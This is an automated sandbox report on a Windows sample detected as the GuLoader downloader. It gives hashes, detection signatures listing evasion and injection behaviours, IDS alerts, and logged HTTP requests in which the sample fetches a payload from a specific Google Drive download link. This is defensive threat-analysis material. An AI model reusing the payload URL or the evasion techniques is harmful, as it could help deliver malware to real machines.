Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
dIPYIbWXs1.exe

Overview

General Information

Sample name:dIPYIbWXs1.exe
renamed because original name is a hash value
Original sample name:1236ae83fc231761095c68a7806bba187823dd2cb9de953f6ccf09e91e04eb97.exe
Analysis ID:1569083
MD5:da70482b3bd657ff83625fbcf998ec60
SHA1:864575ce9283c21c44bad550416ff35f3d38cb0f
SHA256:1236ae83fc231761095c68a7806bba187823dd2cb9de953f6ccf09e91e04eb97
Tags:exeuser-adrian__luca
Infos:

Detection

GuLoader
Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
AI detected suspicious sample
Hides threads from debuggers
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Abnormal high CPU Usage
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
JA3 SSL client fingerprint seen in connection with other malware
PE / OLE file has an invalid certificate
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • dIPYIbWXs1.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\dIPYIbWXs1.exe" MD5: DA70482B3BD657FF83625FBCF998EC60)
    • dIPYIbWXs1.exe (PID: 2000 cmdline: "C:\Users\user\Desktop\dIPYIbWXs1.exe" MD5: DA70482B3BD657FF83625FBCF998EC60)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000000.00000002.3912510121.000000000343F000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
    00000006.00000002.4146024960.000000000222F000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      No Sigma rule has matched
      TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
      2024-12-05T12:55:55.500067+010028032702Potentially Bad Traffic192.168.2.450002172.217.19.174443TCP

      Click to jump to signature section

      Show All Signature Results

      AV Detection

      barindex
      Source: dIPYIbWXs1.exeAvira: detected
      Source: dIPYIbWXs1.exeReversingLabs: Detection: 55%
      Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
      Source: dIPYIbWXs1.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: unknownHTTPS traffic detected: 172.217.19.174:443 -> 192.168.2.4:50002 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:50003 version: TLS 1.2
      Source: unknownHTTPS traffic detected: 142.250.181.1:443 -> 192.168.2.4:50007 version: TLS 1.2
      Source: dIPYIbWXs1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: dIPYIbWXs1.exe, 00000006.00000001.3911363957.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: Binary string: mshtml.pdbUGP source: dIPYIbWXs1.exe, 00000006.00000001.3911363957.0000000000649000.00000020.00000001.01000000.00000007.sdmp
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_0040646B FindFirstFileA,FindClose,0_2_0040646B
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_004027A1 FindFirstFileA,0_2_004027A1
      Source: C:\Users\user\Desktop\dIPYIbWXs1.exeCode function: 0_2_004058BF GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_004058BF
      Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
      Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.4:50002 -> 172.217.19.174:443
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4
      Source: global trafficHTTP traffic detected: GET /download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cache
      Source: global trafficHTTP traffic detected: GET /download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4
      Source: global trafficHTTP traffic detected: GET /download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 11:55:58 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Content-Security-Policy: script-src 'nonce-2fyixl7P8-t7gh8bHRxbYw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7pJwLE_W8xn8o7a8vBoCF5pMdC_1qKxVVUTzef6v1Re-LlIpsUBGxHTAnuDJrfleYnNJeoHbV1IwServer: UploadServerSet-Cookie: NID=519=H9rK_crz2WB83cCqsHhDj-cAY6QK7jJUAzR0XnxSLC6OqUBXGsUdPqsL5MJxcLKiee7jvv3Lftb6O_JcLYQEaMOxANFO3sog_YNSLmStqNfqxpUjXIVWWCKuyFmQO5YijP0T60AUhkxr-_nfLmnhdET-TSTJImWfQAua6H8z3Ygop8B3YNy9W-4; expires=Fri, 06-Jun-2025 11:55:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Thu, 05 Dec 2024 11:56:03 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-mLLyegf47uyLjPHfC8NzZg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC6b-ZjwgLlIfEP8qns_41c-wVXUKC41Nra-L9Z5HENXqgG-XsEfkNH7RHDYTgp9isRdsHwServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: dIPYIbWXs1.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
      Source: dIPYIbWXs1.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: dIPYIbWXs1.exe, 00000006.00000001.3911363957.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: dIPYIbWXs1.exe, 00000006.00000001.3911363957.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: dIPYIbWXs1.exe, 00000006.00000001.3911363957.00000000005F2000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.0000000006977000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ertificates
      Source: dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/ificate
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/oj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069B4000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4167939738.0000000035F00000.00000004.00001000.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.0000000006977000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4146001354.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6Mh
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6Mi
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4042331790.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
      Source: dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4042331790.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download2
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download9
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069CB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download=
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132736489.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4078866792.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4042331790.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=download?
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=downloadA
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=downloadB
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=downloade
      Source: dIPYIbWXs1.exe, 00000006.00000002.4149932805.00000000069DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1ysoj_AKK0q2P4GxIIYBPUPqLClf34i6M&export=downloado
      Source: dIPYIbWXs1.exe, 00000006.00000001.3911363957.0000000000649000.00000020.00000001.01000000.00000007.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.google.com/translate_a/element.js
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://translate.googleapis.com/_/translate_http/_/js/;report-uri
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com/analytics.js
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
      Source: dIPYIbWXs1.exe, 00000006.00000003.4132764326.00000000069E2000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4105436260.00000000069DE000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4051589593.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022569615.00000000069E3000.00000004.00000020.00020000.00000000.sdmp, dIPYIbWXs1.exe, 00000006.00000003.4022621129.00000000069E3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50007
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50006
      Source: unknownNetwork traffic detected: HTTP traffic on port 50007 -> 443
      Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
